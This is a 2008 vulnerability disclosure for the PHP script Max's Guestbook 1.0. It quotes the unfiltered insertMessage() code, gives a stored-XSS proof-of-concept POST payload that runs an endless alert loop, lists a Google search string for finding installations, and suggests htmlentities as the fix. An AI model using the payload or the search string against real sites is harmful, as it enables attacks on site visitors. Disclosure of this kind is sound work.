%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %% Discovered by: GTADarkDude %% Disconvered on: 10 December 2008 %% Name: Max's Guestbook %% Version: 1.0 %% URL: http://www.phpf1.com/product/php-guestbook-script.html %% URL2: http://www.hotscripts.com/Detailed/78571.html %% Google Search: intitle:"Max's Guestbook" powered-by-PHP-F1 %% %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% *** File *** maxGuestbook.class *** Vulnerable Code *** function insertMessage(){ $name = isset($_POST['name']) ? $_POST['name'] : 'Anonymous'; $email = isset($_POST['email']) ? $_POST['email'] : ''; $submitDate = date($this->dateFormat); $content = isset($_POST['message']) ? $_POST['message'] : ''; //(...) $f = fopen($this->messageDir.DIRECTORY_SEPARATOR.$filename.".txt","w+"); fwrite($f,$name."\n"); fwrite($f,$email."\n"); fwrite($f,$submitDate."\n"); fwrite($f,$content."\n"); fclose($f); } *** Exploit *** $_POST['name'], $_POST['email'] AND $_POST['message'] are each not filtered whatsoever. Not when inserted [insertMessage()], nor when displayed [displayGuestbook($page)] -> XSS! POST DATA: name=<script>while(1) alert(1337)</script>; message=qwertyuiop *** Solution *** Easy, simply filter all the $_POST and $_GET variables, for example by using htmlentities($var,ENT_QUOTES)